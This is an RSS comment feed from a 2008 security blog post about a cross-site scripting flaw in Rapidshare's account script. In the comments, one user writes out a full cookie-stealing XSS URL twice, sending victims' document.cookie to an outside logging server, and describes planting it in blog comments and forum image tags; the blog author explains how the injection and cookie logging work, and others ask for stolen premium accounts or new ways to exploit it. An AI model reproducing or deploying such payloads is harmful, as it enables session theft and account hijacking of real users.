<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/2.2.3" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>
<channel>
	<title>Comments on: I Own Your Rapidshare Accounts</title>
	<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/</link>
	<description>Giorgio Maone's answers to the Web, the Universe, and Everything</description>
	<pubDate>Tue, 02 Dec 2008 11:50:00 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.3</generator>

	<item>
		<title>By: Dronen</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8932</link>
		<dc:creator>Dronen</dc:creator>
		<pubDate>Wed, 06 Aug 2008 22:37:30 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8932</guid>
		<description>Fixed on 06-Aug-2008</description>
		<content:encoded><![CDATA[<p>Fixed on 06-Aug-2008</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: N00b</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8930</link>
		<dc:creator>N00b</dc:creator>
		<pubDate>Wed, 06 Aug 2008 19:29:06 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8930</guid>
		<description>I hear that rapidshare have fixed this exploit now :(

Wondered why i couldnt get it to work!!

Is there any other way to do this?</description>
		<content:encoded><![CDATA[<p>I hear that rapidshare have fixed this exploit now :(</p>
<p>Wondered why i couldnt get it to work!!</p>
<p>Is there any other way to do this?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steph</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8853</link>
		<dc:creator>Steph</dc:creator>
		<pubDate>Wed, 30 Jul 2008 17:47:15 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8853</guid>
		<description>It's okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3

But I'm not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the &#34;website&#34; field in a comment, like this : 

http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&#34;http://www.wasabite.com/cookielogger/rapidshare/?c=&#34;%20%2B%20escape(document.cookie);}))()%3C/script%3E

The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :
http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&#34;&#62;   &#60;== See the ?c= %2B escape part... there is no &#34;+&#34;

I also tried on a forum using bbCode.
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&#34;http://www.wasabite.com/cookielogger/rapidshare/?c=&#34;%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]

I have absolutely no clue if it will work. I've never worked with JavaScript before, so I don't know anything about it. The only thing I know is C++ that is very similar to JS.</description>
		<content:encoded><![CDATA[<p>It&#8217;s okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3</p>
<p>But I&#8217;m not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the &quot;website&quot; field in a comment, like this : </p>
<p><a href="http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E</a>((function()%20{new%20Image().src%20=%20&quot;http://www.wasabite.com/cookielogger/rapidshare/?c=&quot;%20%2B%20escape(document.cookie);}))()%3C/script%3E</p>
<p>The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :<br />
<a href="http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&quot;&gt;" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&quot;&gt;</a>   &lt;== See the ?c= %2B escape part&#8230; there is no &quot;+&quot;</p>
<p>I also tried on a forum using bbCode.<br />
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&quot;http://www.wasabite.com/cookielogger/rapidshare/?c=&quot;%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]</p>
<p>I have absolutely no clue if it will work. I&#8217;ve never worked with JavaScript before, so I don&#8217;t know anything about it. The only thing I know is C++ that is very similar to JS.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steph</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8846</link>
		<dc:creator>Steph</dc:creator>
		<pubDate>Wed, 30 Jul 2008 10:34:32 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8846</guid>
		<description>Cool thanks!
But now... how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?
It's the only bit I'm not sure to understand, where the info is recorded.
Thanks! :3</description>
		<content:encoded><![CDATA[<p>Cool thanks!<br />
But now&#8230; how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?<br />
It&#8217;s the only bit I&#8217;m not sure to understand, where the info is recorded.<br />
Thanks! :3</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Giorgio</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8843</link>
		<dc:creator>Giorgio</dc:creator>
		<pubDate>Wed, 30 Jul 2008 06:34:23 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8843</guid>
		<description>@&lt;b&gt;Steph&lt;/b&gt;:
All correct.
[injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script.
I log the cookie to my server by creating an Image object and using the URL for my logger as its &lt;code&gt;src&lt;/code&gt; property: that URL is immediately loaded in background.

@&lt;b&gt;newbie&lt;/b&gt;:
No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its &lt;code&gt;toString()&lt;/code&gt; method.
&lt;code&gt;var [login, pwd] =&lt;/code&gt; is a &lt;a href="http://developer.mozilla.org/en/docs/New_in_JavaScript_1.7#Destructuring_assignment" rel="nofollow"&gt;destructuring assignment&lt;/a&gt;.</description>
		<content:encoded><![CDATA[<p>@<b>Steph</b>:<br />
All correct.<br />
[injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script.<br />
I log the cookie to my server by creating an Image object and using the URL for my logger as its <code>src</code> property: that URL is immediately loaded in background.</p>
<p>@<b>newbie</b>:<br />
No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its <code>toString()</code> method.<br />
<code>var [login, pwd] =</code> is a <a href="http://developer.mozilla.org/en/docs/New_in_JavaScript_1.7#Destructuring_assignment" rel="nofollow">destructuring assignment</a>.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: newbie</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8841</link>
		<dc:creator>newbie</dc:creator>
		<pubDate>Wed, 30 Jul 2008 04:41:55 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8841</guid>
		<description>Hi Giorgio.  What is the purpose for those parenthesis around the function in your injection variable?  Also, what is this thing with the braces called:   var [login, pwd] ?  Thanks</description>
		<content:encoded><![CDATA[<p>Hi Giorgio.  What is the purpose for those parenthesis around the function in your injection variable?  Also, what is this thing with the braces called:   var [login, pwd] ?  Thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steph</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8821</link>
		<dc:creator>Steph</dc:creator>
		<pubDate>Sun, 27 Jul 2008 14:35:03 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8821</guid>
		<description>[injection] contains the hidden script that sends the info right?
[iframe] contains the iframe right?
When it gets to iframe.src, it takes the info from the rapidshare account and does [injection] right?

So now the only thing I need to understand is how [injection] is working and how you’re logging the info on your server.</description>
		<content:encoded><![CDATA[<p>[injection] contains the hidden script that sends the info right?<br />
[iframe] contains the iframe right?<br />
When it gets to iframe.src, it takes the info from the rapidshare account and does [injection] right?</p>
<p>So now the only thing I need to understand is how [injection] is working and how you’re logging the info on your server.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MORON BASHA</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8811</link>
		<dc:creator>MORON BASHA</dc:creator>
		<pubDate>Sat, 26 Jul 2008 21:16:14 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8811</guid>
		<description>(Sigh).........Vishal, you're a moron.

Nobody will ever give you free rapidshare premium. Of course I have some fake
rapidshare premium logins for you to download if you want to bolster my points,
so my RS account can pay for itself. By all means you can have em.

Just let me know. ROFL!

Dont want that? Awww thats too bad, because thats the closest you
will ever get to getting a RS Premium account by begging people on sites.
Save you're effort, kid - spend that effort on finding a JOB, so you can
PURCHASE a RS Premium account like the rest of us.

The fact that we have one and you don't is not anyone else's problem. Its yours.</description>
		<content:encoded><![CDATA[<p>(Sigh)&#8230;&#8230;&#8230;Vishal, you&#8217;re a moron.</p>
<p>Nobody will ever give you free rapidshare premium. Of course I have some fake<br />
rapidshare premium logins for you to download if you want to bolster my points,<br />
so my RS account can pay for itself. By all means you can have em.</p>
<p>Just let me know. ROFL!</p>
<p>Dont want that? Awww thats too bad, because thats the closest you<br />
will ever get to getting a RS Premium account by begging people on sites.<br />
Save you&#8217;re effort, kid - spend that effort on finding a JOB, so you can<br />
PURCHASE a RS Premium account like the rest of us.</p>
<p>The fact that we have one and you don&#8217;t is not anyone else&#8217;s problem. Its yours.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: vishal</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8780</link>
		<dc:creator>vishal</dc:creator>
		<pubDate>Tue, 22 Jul 2008 16:27:58 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8780</guid>
		<description>can anybody provide me a free rapidshare premium accounts i tried wht u code it don't understand how to implament it. so can anybody plz give any premium accounts .
you can send mail to my mail id prudencevishal@aol.com</description>
		<content:encoded><![CDATA[<p>can anybody provide me a free rapidshare premium accounts i tried wht u code it don&#8217;t understand how to implament it. so can anybody plz give any premium accounts .<br />
you can send mail to my mail id <a href="mailto:prudencevishal@aol.com">prudencevishal@aol.com</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: while true {true=false}</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8769</link>
		<dc:creator>while true {true=false}</dc:creator>
		<pubDate>Mon, 21 Jul 2008 17:35:41 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8769</guid>
		<description>&#62;&#62; augianempire@gmail.com
 
Added to spam lists =-)</description>
		<content:encoded><![CDATA[<p>&gt;&gt; <a href="mailto:augianempire@gmail.com">augianempire@gmail.com</a></p>
<p>Added to spam lists =-)</p>
]]></content:encoded>
	</item>
</channel>
</rss>
